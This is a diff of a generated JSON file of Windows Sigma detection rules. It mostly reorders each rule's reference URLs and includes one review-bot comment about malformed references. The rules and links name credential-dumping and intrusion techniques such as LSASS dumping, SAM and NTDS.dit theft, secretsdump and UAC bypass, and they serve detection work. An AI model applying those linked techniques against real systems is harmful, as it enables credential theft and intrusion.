@@ -32394,8 +32394,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", "https://github.com/klinix5/InstallerFileTakeOver", + "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml" ], "tags": [ @@ -32452,10 +32452,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", - "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", - "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", + "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" ], "tags": [ @@ -32488,9 +32488,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", - "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" ], "tags": [ 
@@ -32514,8 +32514,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" ], @@ -32538,8 +32538,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" ], "tags": [ @@ -32613,8 +32613,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/deepinstinct/Lsass-Shtinkering", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml" ], "tags": [ 
@@ -32647,8 +32647,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://github.com/Porchetta-Industries/CrackMapExec", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_cred_dump.yml" ], "tags": [ @@ -32747,8 +32747,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_macro_file.yml" ], "tags": [ @@ -32806,8 +32806,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" ], "tags": [ 
@@ -32898,8 +32898,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/12", + "https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" ], "tags": [ @@ -32958,9 +32958,9 @@ "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://pentestlab.blog/tag/ntds-dit/", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml" ], "tags": [ @@ -32993,8 +32993,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" ], 
@@ -33062,8 +33062,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", + "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" ], "tags": [ @@ -33153,8 +33153,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" ], "tags": [ @@ -33221,11 +33221,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://github.com/cube0x0/CVE-2021-36934", + "https://www.google.com/search?q=%22reg.exe+save%22+sam", + "https://github.com/search?q=CVE-2021-36934", "https://github.com/HuskyHacks/ShadowSteal", "https://github.com/FireFart/hivenightmare", - "https://github.com/cube0x0/CVE-2021-36934", - "https://github.com/search?q=CVE-2021-36934", - "https://www.google.com/search?q=%22reg.exe+save%22+sam", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" ], "tags": [ 
@@ -33375,10 +33375,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/cube0x0/status/1418920190759378944", - "https://github.com/GossiTheDog/HiveNightmare", - "https://github.com/FireFart/hivenightmare/", "https://github.com/WiredPulse/Invoke-HiveNightmare", + "https://github.com/FireFart/hivenightmare/", + "https://github.com/GossiTheDog/HiveNightmare", + "https://twitter.com/cube0x0/status/1418920190759378944", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml" ], "tags": [ @@ -33470,9 +33470,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", - "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", + "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml" ], "tags": [ @@ -33572,8 +33572,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" ], "tags": [ 
@@ -33754,8 +33754,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", + "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" @@ -33812,8 +33812,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_autorun.yml" ], "tags": [ @@ -33897,9 +33897,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", "https://github.com/fox-it/LDAPFragger", - "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml" ], "tags": [ 
@@ -34038,8 +34038,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.joesandbox.com/analysis/465533/0/html", "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://www.joesandbox.com/analysis/465533/0/html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml" ], "tags": [ @@ -34107,8 +34107,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml" ], "tags": [ @@ -34274,10 +34274,10 @@ "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://decoded.avast.io/martinchlumecky/png-steganography/", "https://github.com/Wh04m1001/SysmonEoP", "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://decoded.avast.io/martinchlumecky/png-steganography/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" ], "tags": [ 
@@ -34372,9 +34372,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", - "http://addbalance.com/word/startup.htm", "https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3", + "http://addbalance.com/word/startup.htm", + "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml" ], "tags": [ @@ -34407,8 +34407,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pingback_backdoor.yml" ], "tags": [ @@ -34465,8 +34465,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://twitter.com/cyb3rops/status/1552932770464292864", + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" ], "tags": [ @@ -34815,8 +34815,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" ], "tags": [ 
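Review bot: The entry `"Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/"` in this hunk's `refs` carries a free-text label in front of the URL, so it is not a URL and any consumer that renders or validates `refs` as links will reject or mangle it. Presumably it is copied verbatim from the source rule's `references` field; either strip the prefix in the generator or fix it upstream so the entry is `"https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/"`. The `@@ -30786` and `@@ -33221` hunks in this chunk use Google search URLs as references, which are not stable citations either.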
@@ -34849,8 +34849,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", + "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" ], "tags": [ @@ -34886,8 +34886,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", "https://github.com/lclevy/firepwd", + "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml" ], "tags": [ @@ -35011,8 +35011,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", "https://twitter.com/notwhickey/status/1333900137232523264", + "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml" ], "tags": [ 
@@ -35111,10 +35111,10 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", - "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", + "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml" ], "tags": [ @@ -35147,8 +35147,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml" ], "tags": [ @@ -35256,8 +35256,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" ], "tags": [ 
@@ -35421,8 +35421,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://twitter.com/neonprimetime/status/1436376497980428318", "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://twitter.com/neonprimetime/status/1436376497980428318", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ipify.yml" ], "tags": [ @@ -35747,8 +35747,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml" ], "tags": [ @@ -35844,9 +35844,9 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/eral4m/status/1479106975967240209", + "https://twitter.com/nas_bench/status/1433344116071583746", "https://twitter.com/Hexacorn/status/885258886428725250", "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", - "https://twitter.com/nas_bench/status/1433344116071583746", "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", "https://twitter.com/eral4m/status/1479080793003671557", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml" 
@@ -35981,8 +35981,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/my-name-is-dtrack/93338/", "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", + "https://securelist.com/my-name-is-dtrack/93338/", "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" ], @@ -36074,8 +36074,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml" ], "tags": [ @@ -36157,8 +36157,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", + "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" ], "tags": [ 
@@ -36235,8 +36235,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml" ], "tags": [ @@ -36303,9 +36303,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://twitter.com/frack113/status/1555830623633375232", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/frack113/status/1555830623633375232", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml" ], "tags": [ @@ -36482,9 +36482,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/countuponsec/status/910969424215232518", - "https://twitter.com/countuponsec/status/910977826853068800", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", + "https://twitter.com/countuponsec/status/910977826853068800", + "https://twitter.com/countuponsec/status/910969424215232518", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" ], "tags": [ 
@@ -36574,9 +36574,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", - "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" ], "tags": [ @@ -36691,9 +36691,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", "Reegun J (OCBC Bank)", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", - "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml" ], "tags": [ @@ -36828,10 +36828,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://isc.sans.edu/diary/22264", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml" ], "tags": [ 
@@ -36874,9 +36874,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", - "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", "https://twitter.com/Hexacorn/status/1420053502554951689", + "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", + "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" ], "tags": [ @@ -36918,8 +36918,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/electron/rcedit", - "https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe", "https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915", + "https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rcedit_execution.yml" ], "tags": [ @@ -36997,9 +36997,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://github.com/SigmaHQ/sigma/issues/1009", "https://redcanary.com/blog/raspberry-robin/", + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" ], "tags": [ 
@@ -37079,10 +37079,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", - "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", + "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" ], "tags": [ @@ -37312,8 +37312,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_shell.yml" ], "tags": [ @@ -37387,8 +37387,8 @@ 